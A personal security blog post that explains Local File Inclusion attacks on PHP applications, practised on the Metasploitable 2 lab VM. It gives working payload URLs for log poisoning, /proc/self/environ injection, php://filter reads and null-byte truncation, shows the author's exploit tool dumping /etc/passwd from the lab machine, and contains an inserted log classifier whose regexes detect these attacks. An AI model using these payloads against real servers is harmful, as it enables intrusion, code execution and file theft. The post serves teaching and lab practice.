Hello,

Today, I played a bit with Metasploitable 2. It is really easy to root, so that’s not the interest of this blog post.

Anyhow, I played a bit around and I ended up coding a basic LFI exploit tool.

So yet another post on LFI exploitation …

So what is LFI?

LFI stands for Local File Inclusion. It is a vulnerability that allows you to include local files. Many people think that it’s not really dangerous because it only includes LOCAL files. Unfortunately (depending on which side of the barrier you are on …), that is false: you can execute code through an LFI.

So, how do you exploit it?

By including local files. Yes, local files :).

These are the well-known techniques for LFI:

  • apache logs
  • /proc/self/environ
  • php://input
  • NULL Byte Injection
  • path truncation
  • directory traversal
  • PHP filters
  • image inclusion with PHP code

Apache logs

The Apache logs were publicly readable on old distros. Now, they are only readable by the appropriate users.

You’d basically inject PHP Code through a GET request:

http://victim/<?php system ('id'); ?>

This would leave PHP code in the logs.

Then executing the PHP code is as simple as:

http://victim/?page=/var/log/apache2/access_log

You get code execution if the logs don’t have proper permissions (some old systems remain).

/proc/self/environ

This file is interesting because it stores things like your User-Agent and so on.

So, if you change your User-Agent to

<?php system ('id'); ?>

and use this:

http://victim/?page=/proc/self/environ

Yes, code execution!

php://input

OK, this one executes PHP code included in the POST data.

NULL byte injection and path truncation

This one is pretty neat. Say you have the following code:

<?php include ($_GET['page'] . '.php'); ?>

Well, you can get rid of the ‘.php’ extension using this trick. Just append %00, or looooooots of . or /. sequences: the path gets normalized and voilà, no more extension. NULL byte poisoning doesn’t work on PHP >= 5.3.4, as it has been fixed.

Reverse path truncation is mostly the same, just the ../ is before the file name.

PHP filters

This technique is mainly for leaking files (.php and others).

This doesn’t work if you have a prefix such as here:

<?php include ($prefix . $_GET['page'] . '.php'); ?>

You exploit it using this request for instance:

http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php

As you guessed, the PHP filter is

php://filter/read=convert.base64-encode/resource=

image with PHP code

This one is about appending PHP code to an image. Including the image through the LFI allows you to inject PHP code: the PHP interpreter interprets anything as code as long as it’s inside <?php ?> tags.

If you have an LFI that is not exploitable through /proc/self/environ or the Apache logs, and there is no extension concatenation, this can allow you to exploit it, provided you are able to upload images.

Let’s say you have PHPBB and PhpLdapAdmin 1.1.0.5.

Well, you can upload an image using PHPBB then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution.
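
The techniques above all leave recognizable traces in the web server's access log. As an added example (not part of the original post or of the author's tool), this classifier flags them in Apache combined-format lines; the rule names, thresholds and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'\d{3} \S+ "(?:[^"\\]|\\.)*" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# One rule per technique listed in the post (names and thresholds are assumptions).
RULES = {
    "traversal": re.compile(r"(?:\.\./){2,}"),
    "php_wrapper": re.compile(r"php://(?:filter|input)", re.I),
    "proc_or_log": re.compile(r"/proc/self/environ|/var/log/", re.I),
    "null_byte": re.compile(r"\x00"),
    "path_truncation": re.compile(r"(?:/\.){20,}|\.{40,}"),
    "php_code": re.compile(r"<\?(?:php|=)", re.I),
}

def decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(line):
    """Return the sorted rule names a log line trips, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    request = decode(m["request"])
    hits = {name for name, rx in RULES.items() if rx.search(request)}
    if RULES["php_code"].search(decode(m["agent"])):
        hits.add("php_code")
    return sorted(hits)

# Constructed sample lines (documentation addresses), not taken from a real server.
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /?page=../../../proc/self/environ HTTP/1.1" 200 900 "-" "<?php system ('id'); ?>"
192.0.2.66 - - [01/Jan/2024:10:00:12 +0000] "GET /?page=../../../etc/passwd%00 HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
'''.splitlines()

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), entry.split('"')[1])
```

A php://input request carries its payload in the POST body, which the access log does not record, so only the wrapper name in the URL is visible to this check.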

Exploit

I wrote a basic LFI exploiter that uses PHP filter or /proc/self/environ tricks.

You can get it at LFI exploit tool.

The code isn’t clean and it needs tons of improvement before being a really usable tool. I plan on improving it on an as-needed basis. The cookie functionality is not implemented yet; it is just a placeholder for now.

You can test it on Mutillidae on Metasploitable 2. I haven’t tested it anywhere else yet.

Example of utilisation (this is on metasploitable 2):

$ ./exploit-lfi.py -h
usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION
                      [--replace REPLACE] [--cookie COOKIE]

Exploit LFI

optional arguments:
  -h, --help            show this help message and exit
  --url URL, -u URL     URL to attack
  --action ACTION, -a ACTION
                        exec or read (default)
  --option OPTION, -o OPTION
                        Action argument
  --replace REPLACE, -r REPLACE
                        string to replace
  --cookie COOKIE, -c COOKIE
                        Cookie
$ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd'
[+] Checking vulnerability
Test url : http://192.168.56.107/mutillidae/index.php?page=whatever&
Is vulnerable with param page!
[+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD&
[+] Searching for root path
root : ../../../
[+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD&
[+] Testing : {'path': '/proc/self/environ', 'type': 'header'}
    http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ&
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false 

Conclusion

As you can see in this introduction, code execution is quite possible with an LFI. These aren’t only information-leak vulnerabilities.

That’s all for today.

Cheers,

m_101

Updates - 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work.
